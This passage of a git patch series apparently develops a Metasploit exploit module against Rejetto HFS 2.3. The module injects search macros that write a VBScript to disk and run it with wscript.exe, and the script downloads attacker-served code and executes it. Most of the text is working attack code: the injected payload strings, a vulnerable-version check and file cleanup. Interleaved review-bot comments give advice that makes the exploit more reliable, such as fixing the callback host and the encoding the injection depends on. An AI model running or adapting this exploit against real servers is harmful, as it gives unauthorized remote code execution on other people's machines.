"wsh.exit\x0d\x0a" + vbs_code << "End If\x0d\x0a" + vbs_code << "x.Send\x0d\x0a" + vbs_code << "Execute x.responseText" payloads = [ - "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}", - "exec|wscript.exe //B //NOLOGO #{datastore['SAVE_PATH']}#{file_fullname}", - # using wscript.exe instead of cmd.exe, thank mubix - #"delete|#{datastore['SAVE_PATH']}#{file_fullname}" - # delete vbs file after execution + "save|#{datastore['SAVE_PATH']}#{file_full_name}|#{vbs_code}", + "exec|wscript.exe //B //NOLOGO #{datastore['SAVE_PATH']}#{file_full_name}" ] print_status("Sending a malicious request to #{target_uri.path}") - payloads.each { |payload| + payloads.each do |payload| send_request_raw({ 'method' => 'GET', 'uri' => "/?search=%00{.#{URI::encode(payload)}.}" }) - } - register_file_for_cleanup("#{datastore['SAVE_PATH']}#{file_fullname}") - # use FileDropper method for cleanup + end + 
register_file_for_cleanup("#{datastore['SAVE_PATH']}#{file_full_name}") end def exploit From 909f88680b03448c99ce90b048f4eda674ab6c06 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 8 Oct 2014 11:08:01 -0500 Subject: [PATCH 13/16] Make exploit aggressive --- modules/exploits/windows/http/http_file_server_exec.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb index f1f3454bec..8b27856801 100644 --- a/modules/exploits/windows/http/http_file_server_exec.rb +++ b/modules/exploits/windows/http/http_file_server_exec.rb @@ -42,6 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Automatic', {} ], ], 'Privileged' => false, + 'Stance' => Msf::Exploit::Stance::Aggressive, 'DisclosureDate' => "Sep 11 2014", 'DefaultTarget' => 0)) From 25344aeb6ab25c387dbeea5d7bd957f0c982a178 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 8 Oct 2014 11:55:33 -0500 Subject: [PATCH 14/16] Change filename --- .../http/{http_file_server_exec.rb => rejetto_hfs_exec.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/windows/http/{http_file_server_exec.rb => rejetto_hfs_exec.rb} (100%) diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/rejetto_hfs_exec.rb similarity index 100% rename from modules/exploits/windows/http/http_file_server_exec.rb rename to modules/exploits/windows/http/rejetto_hfs_exec.rb From d90fe4f724c1309b8cf32cdb89f348021a76b3fc Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 8 Oct 2014 12:03:16 -0500 Subject: [PATCH 15/16] Improve check method --- .../exploits/windows/http/rejetto_hfs_exec.rb | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/http/rejetto_hfs_exec.rb b/modules/exploits/windows/http/rejetto_hfs_exec.rb index 8b27856801..aaedbb7d20 100644 --- a/modules/exploits/windows/http/rejetto_hfs_exec.rb 
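Review bot: The URL the dropped script fetches is assembled from `datastore['LHOST']` and `datastore['SRVPORT']`, i.e. the payload handler's address paired with the HTTP server's port; when SRVHOST is bound to an interface other than LHOST, the `x.Open "GET", ...` call targets the wrong host and the `If Err.Number <> 0 Then wsh.exit` branch exits silently with no feedback on the attacker side. If the HttpServer mixin in this tree provides `get_uri`, that yields the server's own reachable URL and is the better source. `URI::encode` is also obsolete in Ruby (removed in 3.0); the framework's `Rex::Text.uri_encode(payload)` is the equivalent, and should be checked to escape at least `|`, `{`, `}`, `%` and CRLF as this code relies on. The `def exploit` below is outside the hunk.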
+++ b/modules/exploits/windows/http/rejetto_hfs_exec.rb @@ -60,8 +60,13 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => '/' }) - if res && res.headers['Server'] && res.headers['Server'] =~ /HFS 2\.3/ - return Exploit::CheckCode::Detected + if res && res.headers['Server'] && res.headers['Server'] =~ /HFS ([\d.]+)/ + version = $1 + if Gem::Version.new(version) <= Gem::Version.new("2.3") + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Safe + end else return Exploit::CheckCode::Safe end @@ -98,10 +103,13 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending a malicious request to #{target_uri.path}") payloads.each do |payload| - send_request_raw({ + res = send_request_raw({ 'method' => 'GET', 'uri' => "/?search=%00{.#{URI::encode(payload)}.}" - }) + }) + if res + print_status("#{res.code}\n#{res.body.to_s}") + end end register_file_for_cleanup("#{datastore['SAVE_PATH']}#{file_full_name}") end From 98b69e095c84fdf91956d412aa311067ad022767 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 8 Oct 2014 12:12:00 -0500 Subject: [PATCH 16/16] Use %TEMP% and update ranking --- .../exploits/windows/http/rejetto_hfs_exec.rb | 17 +++++++---------- 1 file changed, 7 insertions(+), 10 deletions(-) diff --git a/modules/exploits/windows/http/rejetto_hfs_exec.rb b/modules/exploits/windows/http/rejetto_hfs_exec.rb index aaedbb7d20..4311617bd6 100644 --- a/modules/exploits/windows/http/rejetto_hfs_exec.rb +++ b/modules/exploits/windows/http/rejetto_hfs_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking + Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer 
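Review bot: The capture `/HFS ([\d.]+)/` drops the letter revision, so `HFS 2.3b` and any later `2.3x` build both compare as `2.3` and are reported `Detected`; the description only claims 2.3b, so a suffix-aware capture such as `/HFS ([\d.]+[a-z]?)/` with `Gem::Version` (which orders `2.3b` before `2.3c` and both before `2.3`) lets the cutoff be stated exactly once the fixed build is confirmed. `Gem::Version.new` raises `ArgumentError` on a malformed capture such as a trailing dot, which would abort `check` rather than return a code; guard with `Gem::Version.correct?(version)` first. Prefer `Regexp.last_match(1)` over `$1` for readability. The `send_request_raw` that opens `check` sits above the hunk.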
@@ -49,7 +49,6 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ OptString.new('TARGETURI', [true, 'The path of the web application', '/']), - OptString.new('SAVE_PATH', [true, 'Target writable path', 'c:\\']), OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 10]), ], self.class) end @@ -86,6 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote file_name = rand_text_alpha(rand(10)+5) file_ext = '.vbs' file_full_name = file_name + file_ext + vbs_path = "%TEMP%\\#{file_full_name}" vbs_code = "Set x=CreateObject(\"Microsoft.XMLHTTP\")\x0d\x0a" vbs_code << "On Error Resume Next\x0d\x0a" @@ -97,27 +97,24 @@ class Metasploit3 < Msf::Exploit::Remote vbs_code << "Execute x.responseText" payloads = [ - "save|#{datastore['SAVE_PATH']}#{file_full_name}|#{vbs_code}", - "exec|wscript.exe //B //NOLOGO #{datastore['SAVE_PATH']}#{file_full_name}" + "save|#{vbs_path}|#{vbs_code}", + "exec|wscript.exe //B //NOLOGO #{vbs_path}" ] print_status("Sending a malicious request to #{target_uri.path}") payloads.each do |payload| - res = send_request_raw({ + send_request_raw({ 'method' => 'GET', 'uri' => "/?search=%00{.#{URI::encode(payload)}.}" }) - if res - print_status("#{res.code}\n#{res.body.to_s}") - end end - register_file_for_cleanup("#{datastore['SAVE_PATH']}#{file_full_name}") + register_file_for_cleanup(vbs_path) end def exploit begin Timeout.timeout(datastore['HTTPDELAY']) { super } - rescue Timeout::Error + rescue Timeout::Error # When the server stops due to our timeout, this is raised end end
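Review bot: `register_file_for_cleanup(vbs_path)` now receives the literal `%TEMP%\<name>.vbs`; HFS and `wscript.exe` expand `%TEMP%` on the target, but FileDropper's removal runs through the session, and whether that expands environment variables depends on the session type (a cmd shell presumably does, a Meterpreter file-API call presumably does not), so the script may be left behind — resolve the real path or note the limitation in a comment next to the call. Both `send_request_raw` results are still discarded, so a refused connection or an error reply from the `save` step goes unnoticed and `exec` is sent regardless; capture it as `res = send_request_raw(...)` and `fail_with(Failure::Unreachable, "#{peer} - No response") unless res`. The class-closing `end` is outside the hunk.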